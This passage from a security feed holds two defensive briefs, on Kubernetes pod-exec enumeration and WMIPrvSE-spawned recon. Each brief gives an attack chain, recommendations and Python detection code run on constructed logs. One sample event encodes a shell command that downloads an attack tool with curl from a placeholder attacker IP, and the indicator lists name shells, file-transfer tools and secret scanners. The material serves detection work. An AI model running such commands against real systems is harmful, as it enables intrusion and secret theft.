<li>The attacker uses <code>kubectl</code> within a pod to gather information about cluster resources, such as pods, services, and deployments.</li>
<li>The attacker runs <code>curl</code> or <code>wget</code> inside a pod to fetch additional tooling, facilitating further reconnaissance or lateral movement.</li>
<li>The attacker uses tools like <code>Rakkess</code> to enumerate role-based access control (RBAC) permissions to identify potential privilege escalation paths.</li>
<li>The attacker deploys <code>TruffleHog</code> to scan pod environments for exposed secrets, such as API keys and passwords.</li>
<li>The attacker exfiltrates gathered information and secrets or uses the gained access for lateral movement within the cluster or connected networks.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful enumeration of a Kubernetes cluster can provide attackers with detailed information about the cluster&rsquo;s architecture, deployed applications, and security configurations. This allows attackers to identify vulnerabilities, escalate privileges, and gain access to sensitive data, such as API keys, passwords, and other secrets. This can lead to data breaches, service disruptions, and compromised infrastructure. The impact can range from a limited data exposure to a full-scale compromise of the entire Kubernetes environment and connected cloud resources.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the &ldquo;Kubernetes Potential Enumeration Activity&rdquo; Sigma rule to your SIEM to detect API requests containing shell commands, file transfer utilities, or specialized tools.</li>
<li>Investigate any alerts triggered by the rule to determine the scope and impact of the potential enumeration activity: which principal issued the exec, into which pod, and what the decoded command was.</li>
<li>Review and harden RBAC configurations, in particular who holds <code>create</code> on <code>pods/exec</code>, to minimize the potential for privilege escalation (ATT&amp;CK T1609, Container Administration Command).</li>
<li>Implement strict network segmentation to limit lateral movement within the cluster and connected networks.</li>
<li>Regularly scan pods for exposed secrets using dedicated secret scanning tools and enforce secure secret management practices.</li>
<li>Monitor Kubernetes audit logs for unusual or unauthorized API activity (Sigma logsource: <code>kubernetes</code>, service <code>audit</code>).</li>
</ul>
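<p>Attack-chain step 3 notes that the shell path may arrive URL-encoded, which is the part a naive string match gets wrong. As an added example (not the feed&rsquo;s Sigma rule), the Python below decodes the <code>command=</code> parameters of a <code>pods/exec</code> request from the audit event&rsquo;s <code>requestURI</code>, undoes repeated percent-encoding, splits <code>-c</code> one-liners, and classifies the result against the indicator families the brief names: shells, <code>curl</code>/<code>wget</code>, and Rakkess, TruffleHog and <code>kubectl</code>. The audit events are constructed; the <code>requestURI</code> shape is what <code>kubectl exec</code> produces.</p>

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Indicator families from the brief: shells, file-transfer utilities, and the
# tools it names (Rakkess, TruffleHog, kubectl run from inside a pod).
INDICATORS = {
    "shell": {"sh", "bash", "dash", "ash", "zsh"},
    "transfer": {"curl", "wget"},
    "tooling": {"rakkess", "trufflehog", "kubectl"},
}


def _fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding (%252F -> %2F -> /), stopping when stable."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_exec_request(ev):
    """For a pods/exec audit event, decode the command= parameters from requestURI and
    return (sorted indicator families, reconstructed command line), or None."""
    ref = ev.get("objectRef") or {}
    if ref.get("resource") != "pods" or ref.get("subresource") != "exec":
        return None
    # parse_qs decodes one layer; decode further layers per argument so that a '&'
    # hidden inside a double-encoded argument cannot split the query early.
    query = urlsplit(ev.get("requestURI", "")).query
    argv = [_fully_unquote(a) for a in parse_qs(query).get("command", [])]
    if not argv:
        return None
    tokens = set()
    for arg in argv:
        # Split shell one-liners passed via "-c" so 'curl ... | sh' is inspected too.
        for tok in arg.replace("|", " ").replace(";", " ").replace("&&", " ").split():
            tokens.add(posixpath.basename(tok.lower()))
    families = sorted(name for name, words in INDICATORS.items() if words & tokens)
    return (families, " ".join(argv)) if families else None


def scan_audit_log(events):
    """Run the classifier over audit events and return triage-ready hits."""
    hits = []
    for ev in events:
        result = classify_exec_request(ev)
        if result:
            ref = ev["objectRef"]
            hits.append({"user": ev["user"]["username"],
                         "pod": f'{ref.get("namespace")}/{ref.get("name")}',
                         "categories": result[0], "command": result[1]})
    return hits


def _exec_event(user, ns, pod, query):
    """Constructed audit event for a kubectl-style exec call (not a real log line)."""
    return {"verb": "create", "user": {"username": user},
            "objectRef": {"resource": "pods", "subresource": "exec",
                          "namespace": ns, "name": pod},
            "requestURI": f"/api/v1/namespaces/{ns}/pods/{pod}/exec?{query}&stdout=true&tty=true"}


SAMPLE_EVENTS = [
    # Shell plus a download of Rakkess from an attacker host (documentation address).
    _exec_event("system:serviceaccount:default:web", "default", "web-0",
                "command=%2Fbin%2Fsh&command=-c&command=curl%20-s%20http%3A%2F%2F203.0.113.7%2Frakkess%20-o%20%2Ftmp%2Frakkess"),
    # Double-encoded shell path: a single unquote would leave '%2Fbin%2Fbash' unmatched.
    _exec_event("alice", "prod", "api-1", "command=%252Fbin%252Fbash"),
    # Benign: reading a file, no indicator.
    _exec_event("deploy-bot", "prod", "api-1", "command=cat&command=%2Fetc%2Fhostname"),
    # Not an exec at all.
    {"verb": "list", "user": {"username": "alice"},
     "objectRef": {"resource": "pods", "namespace": "prod"},
     "requestURI": "/api/v1/namespaces/prod/pods"},
]
```

<p>Matching on the basename of every token, rather than on the first argument only, is what catches the download in the first sample: the shell is <code>/bin/sh</code>, but the interesting indicators (<code>curl</code> and the <code>rakkess</code> binary being fetched) sit inside the <code>-c</code> string.</p>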
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>kubernetes</category><category>enumeration</category><category>cloud</category></item><item><title>Suspicious Enumeration Commands Spawned via WMIPrvSE</title><link>https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/</link><pubDate>Wed, 03 Jan 2024 15:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-wmiprvse-enumeration/</guid><description>This rule detects suspicious execution of system enumeration commands by the Windows Management Instrumentation Provider Service (WMIPrvSE), indicating potential reconnaissance or malicious activity on Windows systems.</description><content:encoded><![CDATA[<p>Attackers can leverage the Windows Management Instrumentation (WMI) to execute commands for reconnaissance and enumeration within a compromised system. This involves spawning native Windows tools via the WMI Provider Service (WMIPrvSE). This activity is often used to gather system and network information in a stealthy manner, which could be part of a larger attack, such as lateral movement or privilege escalation. This behavior matters because it allows adversaries to gather information about the target environment without using easily detectable methods, potentially leading to further compromise.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).</li>
<li>The attacker uses WMI to execute a reconnaissance command.</li>
<li>The WMI Provider Service, <code>WmiPrvSE.exe</code>, handles the request (for example a <code>Win32_Process</code> <code>Create</code> call) and becomes the parent of the spawned process.</li>
<li>The attacker executes commands such as <code>ipconfig.exe</code>, <code>net.exe</code>, or <code>systeminfo.exe</code> via WmiPrvSE.exe to gather network configuration details, user information, and system information.</li>
<li>The enumerated information is collected and potentially exfiltrated to a command and control server.</li>
<li>The attacker uses the gathered information to identify further targets within the network.</li>
<li>The attacker moves laterally to other systems using stolen credentials or exploited vulnerabilities.</li>
<li>The attacker achieves their final objective, such as data exfiltration, ransomware deployment, or persistent access.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful execution of enumeration commands via WMIPrvSE allows attackers to gather sensitive information about the system and network environment. This information can be used to facilitate lateral movement, privilege escalation, and data theft, potentially leading to significant financial loss, reputational damage, and disruption of business operations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable Sysmon process creation logging (event ID 1), which records both the spawned image and its parent image and is the data source for this detection.</li>
<li>Deploy the Sigma rule &ldquo;Enumeration Command Spawned via WMIPrvSE&rdquo; to your SIEM to detect suspicious WMIPrvSE activity.</li>
<li>Investigate any instances of WMIPrvSE spawning common enumeration tools such as <code>net.exe</code>, <code>ipconfig.exe</code>, or <code>systeminfo.exe</code>, including cases where it spawns <code>cmd.exe</code> to run them; note the user context, since WMI-driven execution under a service or admin account is a common lateral-movement pattern.</li>
<li>Implement network segmentation to limit the scope of potential lateral movement following successful enumeration.</li>
</ul>
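<p>The following Python is an added example, not the feed&rsquo;s Sigma rule, applying the parent-child check from the attack chain to constructed Sysmon event ID 1 records. It normalises image paths to a tool name, matches <code>WmiPrvSE.exe</code> as the parent, and also looks inside the command line when the child is <code>cmd.exe</code>, since <code>cmd.exe /c net user</code> is how WMI-launched recon often appears. The tool list extends the three binaries the brief names with a few other native recon utilities; that extension is this example&rsquo;s assumption.</p>

```python
import ntpath

# Native tools the brief names (ipconfig, net, systeminfo) plus a few more recon
# binaries; the extension beyond those three is this example's assumption.
ENUM_TOOLS = {"ipconfig", "net", "systeminfo", "whoami", "nltest", "netstat",
              "tasklist", "hostname", "arp", "route", "nslookup", "quser"}


def _tool_name(path_or_token):
    """Normalize 'C:\\Windows\\System32\\NET.EXE', '"net.exe"' or 'net' to 'net'."""
    name = ntpath.basename(path_or_token.strip('"')).lower()
    return name[:-4] if name.endswith(".exe") else name


def wmiprvse_enumeration(ev):
    """Return the recon tool name if this Sysmon process-creation event (ID 1) is
    WmiPrvSE.exe spawning one, directly or through cmd.exe /c, else None."""
    if ev.get("EventID") != 1:
        return None
    if _tool_name(ev.get("ParentImage", "")) != "wmiprvse":
        return None
    child = _tool_name(ev.get("Image", ""))
    if child in ENUM_TOOLS:
        return child
    if child == "cmd":
        # 'cmd.exe /c "net user /domain"': look at what cmd was asked to run.
        for tok in ev.get("CommandLine", "").split():
            if _tool_name(tok) in ENUM_TOOLS:
                return _tool_name(tok)
    return None


def find_wmiprvse_enumeration(events):
    """Collect hits plus a per-host count so a burst on one host stands out."""
    hits = []
    for ev in events:
        tool = wmiprvse_enumeration(ev)
        if tool:
            hits.append({"host": ev["Computer"], "time": ev["UtcTime"], "tool": tool,
                         "user": ev.get("User"), "command_line": ev.get("CommandLine")})
    per_host = {}
    for h in hits:
        per_host[h["host"]] = per_host.get(h["host"], 0) + 1
    return hits, per_host


def sample_process_events():
    """Constructed Sysmon event-ID-1 records (not real telemetry)."""
    wmi = r"C:\Windows\System32\wbem\WmiPrvSE.exe"
    sys32 = r"C:\Windows\System32"
    return [
        {"EventID": 1, "UtcTime": "2024-01-03 14:02:10.001", "Computer": "FS-01",
         "User": "CORP\\svc-backup", "ParentImage": wmi,
         "Image": sys32 + r"\ipconfig.exe", "CommandLine": "ipconfig /all"},
        {"EventID": 1, "UtcTime": "2024-01-03 14:02:11.250", "Computer": "FS-01",
         "User": "CORP\\svc-backup", "ParentImage": wmi,
         "Image": sys32 + r"\cmd.exe", "CommandLine": 'cmd.exe /c "net user /domain"'},
        # PowerShell under WmiPrvSE is suspicious too, but it is not a native
        # enumeration binary and belongs to a different rule.
        {"EventID": 1, "UtcTime": "2024-01-03 14:02:12.000", "Computer": "FS-01",
         "User": "CORP\\svc-backup", "ParentImage": wmi,
         "Image": sys32 + r"\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": "powershell -enc AAAA"},
        # Same tool, interactive parent: not this pattern.
        {"EventID": 1, "UtcTime": "2024-01-03 14:05:00.000", "Computer": "WS-17",
         "User": "CORP\\jdoe", "ParentImage": r"C:\Windows\explorer.exe",
         "Image": sys32 + r"\ipconfig.exe", "CommandLine": "ipconfig"},
    ]
```

<p>Two hits on one host within a couple of seconds, both under a service account, is the shape to triage first; the per-host count exists so that an analyst sees the burst rather than two unrelated events.</p>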
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>enumeration</category><category>wmi</category><category>discovery</category><category>execution</category><category>windows</category></item></channel></rss>